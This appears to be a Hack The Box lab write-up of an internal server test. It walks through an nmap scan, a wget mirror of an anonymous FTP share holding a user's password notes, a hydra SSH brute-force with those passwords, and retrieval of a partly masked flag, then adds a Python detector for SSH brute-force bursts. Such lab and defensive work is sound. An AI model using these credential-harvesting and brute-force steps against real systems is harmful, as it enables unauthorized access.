We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format:
HTB{...}
In this post, we will review the security of the second server, which is an internal server within the inlanefreight.htb domain. This server manages and stores emails and files, and serves as a backup for some of the company's processes. According to internal conversations, this server is used relatively rarely and mainly for testing purposes.
Task
Assess the target server and find the flag.txt file. Submit the contents of this file as your answer.
Solution Steps
- Enumerate the Target
Perform a full port scan and service enumeration on the target server:
sudo nmap -sV -p- 10.129.xxx.xx -Pn
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
110/tcp open pop3 Dovecot pop3d
995/tcp open ssl/pop3 Dovecot pop3d
2121/tcp open ftp?
30021/tcp open ftp?
- Download Files via FTP
Use wget to mirror the contents of the FTP server:
wget -m --no-passive ftp://anonymous:anonymous@10.129.xxx.xx:30021/
Output:
--2024-08-01 09:06:31-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/
=> ‘10.129.xxx.xx:30021/.listing’
Connecting to 10.129.xxx.xx:30021... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.
==> PWD ... done.
==> TYPE I ... done.
==> CWD not needed.
==> PORT ... done.
==> LIST ... done.
--2024-08-01 09:06:38-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/simon/
=> ‘10.129.xxx.xx:30021/simon/.listing’
==> CWD (1) /simon ... done.
==> PORT ... done.
==> LIST ... done.
...
--2024-08-01 09:06:39-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/simon/mynotes.txt
=> ‘10.129.xxx.xx:30021/simon/mynotes.txt’
==> CWD not required.
==> PORT ... done.
==> RETR mynotes.txt ... done.
Length: 153
...
‘10.129.xxx.xx:30021/simon/mynotes.txt’ saved [153]
FINISHED --2024-08-01 09:06:39--
Total wall clock time: 8.3s
Downloaded: 3 files, 517 in 0.002s (215 KB/s)
View the Contents of the Downloaded File:
cat 10.129.xxx.xx:30021/simon/mynotes.txt
Output:
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
...
- Brute-Force SSH Login
Use hydra to brute-force the SSH login using the passwords found in mynotes.txt:
hydra -l simon -P mynotes.txt -u 10.129.xxx.xx ssh
Results:
[22][ssh] host: 10.129.xxx.xx login: simon password: **************
- Access the Server via SSH
Log into the server using the obtained credentials:
ssh simon@10.129.XXX.xx
- Find and Retrieve the Flag
List the contents of the home directory and display the flag:
ls
flag.txt Maildir
cat flag.txt
Output:
HTB{1qay2wsx3*******_******}
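From the defender's side, the SSH step above leaves a distinctive trace in the server's auth log: a burst of "Failed password" events for one account from one source, followed by an "Accepted password" from the same source. The following detector is an added example written for this post, not code from the original writeup or the lab; the log lines are constructed samples, and the threshold and time window are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd log lines (syslog format); not taken from a real host.
SAMPLE_AUTH_LOG = """\
Aug  1 09:10:01 backup sshd[2301]: Failed password for simon from 10.10.14.5 port 51002 ssh2
Aug  1 09:10:02 backup sshd[2303]: Failed password for simon from 10.10.14.5 port 51004 ssh2
Aug  1 09:10:02 backup sshd[2305]: Failed password for simon from 10.10.14.5 port 51006 ssh2
Aug  1 09:10:03 backup sshd[2307]: Failed password for simon from 10.10.14.5 port 51008 ssh2
Aug  1 09:10:04 backup sshd[2309]: Accepted password for simon from 10.10.14.5 port 51010 ssh2
Aug  1 09:15:30 backup sshd[2400]: Failed password for alice from 10.10.14.9 port 40000 ssh2
Aug  1 09:40:00 backup sshd[2500]: Accepted publickey for alice from 10.10.14.9 port 40010 ssh2
"""

# Matches the standard OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_line(line, year=2024):
    """Parse one sshd auth line into a dict, or None if it is not an auth result."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog lacks the year
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "src": m["src"]}

def detect_bruteforce(log_text, threshold=4, window=timedelta(minutes=5)):
    """Return (src, user, failures, succeeded) for each source that reached
    `threshold` failed password attempts against one account inside `window`;
    `succeeded` is True when a password login from that source followed the burst."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    failures = defaultdict(list)  # (src, user) -> timestamps of recent failures
    alerts = {}
    for ev in events:
        key = (ev["src"], ev["user"])
        if ev["result"] == "Failed":
            fl = failures[key]
            fl.append(ev["ts"])
            while fl and ev["ts"] - fl[0] > window:  # slide the window forward
                fl.pop(0)
            if len(fl) >= threshold:
                alerts.setdefault(key, {"failures": 0, "succeeded": False})["failures"] = len(fl)
        elif ev["result"] == "Accepted" and ev["method"] == "password" and key in alerts:
            alerts[key]["succeeded"] = True  # burst of failures followed by a password login
    return [(src, user, a["failures"], a["succeeded"]) for (src, user), a in alerts.items()]
```

An alert with `succeeded=True` is the case that needs an incident response, not just a block rule; a single failure from another source, like alice's, stays below the threshold.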
By following these steps, we successfully enumerated the services on the target server, retrieved files from the FTP server, brute-forced the SSH login, and accessed the server to find the flag.
The whole chain rested on two weaknesses: an FTP service that allowed anonymous access to a user's personal notes, and an SSH service that still accepted password logins. This demonstrates an effective approach to assessing the security of internal email and file management services.